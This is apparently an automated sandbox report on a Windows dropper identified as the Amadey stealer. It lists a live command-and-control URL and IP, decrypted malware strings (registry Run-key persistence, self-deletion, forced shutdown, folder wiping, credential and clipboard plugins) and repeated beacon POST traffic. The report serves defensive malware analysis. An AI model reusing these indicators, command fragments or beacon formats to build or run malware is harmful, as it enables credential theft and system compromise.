Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A3F05C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00A3F05C

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A2C365 GetVersionExW,

0_2_00A2C365

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 14.2.powershell.exe.a081288.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.a081288.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2234189987.000000000A080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2235318287.000000000A0F1000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3354959740.000000000AAE1000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
85.114.96.4	ruspyc.top	Palestinian Territory Occupied		42314	FUSIONPS	true

Contacted Domains

Name	IP	Active
ruspyc.top	85.114.96.4	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ruspyc.top/j4Fvskd3/index.php	true		unknown
ruspyc.top/j4Fvskd3/index.php	true		low

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\startup_str_958.vbs

Avira: detection malicious, Label: VBS/Runner.VPXO

Found malware configuration

Source: 14.2.powershell.exe.a081288.4.unpack

Malware Configuration Extractor: Amadey {"C2 url": "ruspyc.top/j4Fvskd3/index.php", "Version": "4.18"}

Multi AV Scanner detection for submitted file

Source: jcgLYlM4dg.exe

ReversingLabs: Detection: 26%

Sample uses string decryption to hide its real strings

Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ruspyc.top
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: /j4Fvskd3/index.php
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: S-%lu-
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: 5027aaabaf
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Dctooux.exe
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Startup
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: rundll32
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Programs
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: %USERPROFILE%
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: http://
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: https://
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: /Plugins/
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: &unit=
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: shell32.dll
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: kernel32.dll
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: GetNativeSystemInfo
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ProgramData\
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: AVAST Software
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Kaspersky Lab
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Panda Security
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Doctor Web
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: 360TotalSecurity
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Bitdefender
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Norton
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Sophos
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Comodo
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: WinDefender
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: 0123456789
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ------
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ?scr=1
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ComputerName
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: -unicode-
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: VideoID
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: DefaultSettings.XResolution
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: DefaultSettings.YResolution
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: ProductName
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: CurrentBuild
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: rundll32.exe
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: "taskkill /f /im "
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: " && timeout 1 && del
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: && Exit"
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: " && ren
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: Powershell.exe
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: shutdown -s -t 0
Source: 14.2.powershell.exe.a081288.4.unpack	String decryptor: random

Uses 32bit PE files

Source: jcgLYlM4dg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jcgLYlM4dg.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: jcgLYlM4dg.exe

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00A2BA94
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00A3D420
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4C508 FindFirstFileExA,	0_2_00A4C508

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49705 -> 85.114.96.4:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: ruspyc.top/j4Fvskd3/index.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
